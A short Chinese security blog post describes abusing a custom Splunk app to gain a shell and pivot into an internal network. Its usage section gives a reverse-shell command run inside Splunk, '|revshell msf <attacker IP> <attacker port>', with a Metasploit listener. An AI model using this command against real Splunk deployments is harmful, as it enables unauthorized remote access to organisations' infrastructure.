通过splunk自定义app获取shell

日期：2019-04-18 00:23:22 栏目：网络安全浏览：1466 评论：0

Splunk是一个日志、流量聚合分析工具，通常用于防御分析和基础设施管理。正日Github作者说的，虽然这些工具可以很好地发现安全事件及风险，但它们也会反过来被攻击者利用，攻陷splunk并渗透内网中，成为管理员的噩梦。

使用方法：

上传APP后，本地使用MSF监听，并在splunk中执行以下语句即可获取shell

|revshell msf <attacker IP> <attacker port>

您需要登录账户后才能发表评论

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。